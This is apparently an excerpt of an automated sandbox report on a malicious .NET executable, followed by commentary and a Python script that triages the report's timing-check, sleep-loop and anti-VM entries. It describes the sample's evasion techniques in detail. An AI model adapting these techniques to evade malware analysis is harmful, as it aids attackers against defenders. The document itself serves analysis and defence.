Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: yaM8XR1HfL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: yaM8XR1HfL.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 0.2.yaM8XR1HfL.exe.3a926c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.3a926c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.53f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.53f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2494695632.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
Source: yaM8XR1HfL.exe, w4M6D.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress, 9_2_0014AA8C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_05C313BF push cs; ret 0_2_05C313CE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07210EC5 push FFFFFFE9h; ret 0_2_07210EC7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07210DC6 push FFFFFFE9h; retn 0001h 0_2_07210DC8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07219191 pushad ; ret 0_2_072191A3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_075659EB push FFFFFFC3h; ret 0_2_07565A25
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDF508 push 00000059h; ret 0_2_07CDF516
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145225F pushad ; ret 4_2_014527F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014527FA pushad ; ret 4_2_014527F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD push ecx; mov dword ptr [esp], ecx 4_2_014809B6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145283D push eax; iretd 4_2_01452858
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145135E push eax; iretd 4_2_01451369
Source: C:\Windows\explorer.exe Code function: 7_2_0925BB02 push esp; retn 0000h 7_2_0925BB03
Source: C:\Windows\explorer.exe Code function: 7_2_0925BB1E push esp; retn 0000h 7_2_0925BB1F
Source: C:\Windows\explorer.exe Code function: 7_2_0925B9B5 push esp; retn 0000h 7_2_0925BAE7
Source: C:\Windows\explorer.exe Code function: 7_2_106E49B5 push esp; retn 0000h 7_2_106E4AE7
Source: C:\Windows\explorer.exe Code function: 7_2_106E4B02 push esp; retn 0000h 7_2_106E4B03
Source: C:\Windows\explorer.exe Code function: 7_2_106E4B1E push esp; retn 0000h 7_2_106E4B1F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126F7C push eax; retf 9_2_00126F85
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127036 push eax; retf 9_2_00127EF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127026 pushad ; iretd 9_2_00127029
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00173168 push ecx; ret 9_2_0017317B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00129431 push ds; iretd 9_2_00129432
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00129537 push esi; retf 9_2_0012954C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0012959A push CFE2086Ah; ret 9_2_001295AB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001296FD push ds; iretd 9_2_001296FE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127CEA push eax; retf 9_2_00127EF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040527FA pushad ; ret 9_2_040527F9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0405225F pushad ; ret 9_2_040527F9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0405283D push eax; iretd 9_2_04052858
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040809AD push ecx; mov dword ptr [esp], ecx 9_2_040809B6
Source: yaM8XR1HfL.exe Static PE information: section name: .text entropy: 7.1884613511282724

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File opened: C:\Users\user\Desktop\yaM8XR1HfL.exe\:Zone.Identifier read attributes | delete
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (this identical entry is recorded 4 times in the report)
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 2F79904 second address: 2F7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 2F79B7E second address: 2F79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 2850000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 4850000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 7CE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 8CE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 8EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 9EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: A240000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: B240000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: C240000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E rdtsc 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 809 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 791 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Window / User API: threadDelayed 9730 Jump to behavior
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API coverage: 0.9 %
Source: C:\Windows\SysWOW64\WWAHost.exe API coverage: 0.7 %
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 6648 Thread sleep time: -63000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 2764 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4788 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 240 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 9730 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -19460000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016B120 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [esi+000000a4h], 03h and CTI: je 00191D18h 9_2_0016B120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00149760 GetSystemTimeAsFileTime followed by cmp: cmp al, 01h and CTI: jne 00149886h 9_2_00149760
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0017212C memset,FindFirstFileW,FindClose, 9_2_0017212C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxTray
Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.3302042587.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2499817163.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
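Three groups of entries above are worth reading together rather than one line at a time. The RDTSC interceptor lines show the classic timing check: two rdtsc instructions six bytes apart with the first low dword parked in ecx, so the code can compare the two counters and bail out if a hypervisor or single-stepping debugger stretched the gap. The "Thread sleep" lines come in two shapes: a single delay of 922337203685477, which is Int64.MaxValue in 100-ns ticks printed in milliseconds, i.e. a thread parked forever, and the WWAHost.exe thread 6572 pattern of 240 and then 9730 calls totalling 480000 and 19460000, i.e. a loop of 2000-unit sleeps that burns sandbox time without a single long sleep that a sandbox could skip. The "Binary or memory string" lines need a caveat: the VMware, Hyper-V and STORAGE device names found in explorer.exe memory are the sandbox's own hardware enumeration and say nothing about the malware, whereas "VBoxTray" and "sandboxie...SOFTWARE\VMware, Inc.\VMware VGAuth" sit in the sample's own memory and are the crypter's anti-VM lookups. The script below, an added example that is not part of the report or of the sandbox's tooling, parses these three line shapes from the report text and produces that triage; it assumes the sleep values are milliseconds (the report prints "s", but its 30000 threshold only makes sense as 30 seconds in ms) and that the sample's process name is yaM8XR1HfL.exe. The embedded lines are copied from the report above.

```python
import re

# Line shapes copied from the sandbox report (sleep, RDTSC and memory-string signatures).
SLEEP_RE = re.compile(
    r"^Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep "
    r"(?P<kind>count|time): -?(?P<value>\d+)s? (?:>=|>) -?\d+s?"
)
RDTSC_RE = re.compile(
    r"^Source: (?P<proc>\S+) RDTSC instruction interceptor: First address: "
    r"(?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+)"
)
MEMSTR_RE = re.compile(r"^Source: (?P<proc>[^,]+),.*?Binary or memory string: (?P<s>.*)$")

# Int64.MaxValue in 100-ns ticks, printed by the report in milliseconds:
# a delay of this size is an effectively infinite wait, not a real sleep.
INFINITE_MS = (2**63 - 1) // 10_000

VM_MARKERS = ("vmware", "vbox", "virtualbox", "hyper-v", "sandboxie", "virtual_disk", "virtual_dvd")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_sleeps(text):
    """Collect (kind, value) events per (process, tid), preserving report order."""
    threads = {}
    for line in text.splitlines():
        m = SLEEP_RE.match(line.strip())
        if m:
            key = (basename(m["proc"]), int(m["tid"]))
            threads.setdefault(key, []).append((m["kind"], int(m["value"])))
    return threads


def classify_thread(events):
    """A 'count' line directly followed by a 'time' line describes one sleep loop;
    a lone 'time' line is a single long delay. Values are treated as milliseconds
    (assumption, see lead-in). Returns (label, number of calls, ms per call)."""
    verdicts, i = [], 0
    while i < len(events):
        kind, value = events[i]
        if kind == "count" and i + 1 < len(events) and events[i + 1][0] == "time":
            verdicts.append(("sleep_loop", value, events[i + 1][1] / value))
            i += 2
        elif kind == "time":
            label = "infinite_wait" if value >= INFINITE_MS else "long_sleep"
            verdicts.append((label, 1, float(value)))
            i += 1
        else:
            verdicts.append(("count_only", value, 0.0))
            i += 1
    return verdicts


def parse_rdtsc(text):
    """Return (process, address of first rdtsc, byte distance to the second rdtsc)."""
    out = []
    for line in text.splitlines():
        m = RDTSC_RE.match(line.strip())
        if m:
            first, second = int(m["first"], 16), int(m["second"], 16)
            out.append((basename(m["proc"]), first, second - first))
    return out


def vm_strings(text, sample_name):
    """Split VM-related memory strings into those in the sample's own memory (candidate
    anti-VM lookups) and those in host processes such as explorer.exe (the sandbox's
    own device names, not evidence of a check performed by the malware)."""
    own, host = [], []
    for line in text.splitlines():
        m = MEMSTR_RE.match(line.strip())
        if not m:
            continue
        s = m["s"].strip()
        if any(k in s.lower() for k in VM_MARKERS):
            (own if basename(m["proc"]) == sample_name else host).append(s)
    return own, host


def triage(text, sample_name="yaM8XR1HfL.exe"):
    own, host = vm_strings(text, sample_name)
    return {
        "sleeps": {k: classify_thread(v) for k, v in parse_sleeps(text).items()},
        "rdtsc": parse_rdtsc(text),
        "vm_strings_in_sample": own,
        "vm_strings_in_host_processes": host,
    }


# Constructed input: lines copied from the report above.
SAMPLE = r"""
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 6648 Thread sleep time: -63000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4788 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 240 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 9730 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -19460000s >= -30000s Jump to behavior
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxTray
Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Run against the full report text instead of SAMPLE to get the same breakdown for every thread; the per-call figure is what separates an evasion loop (thousands of short sleeps) from a parked .NET worker thread (one infinite wait).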
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information queried: ProcessInformation Jump to behavior
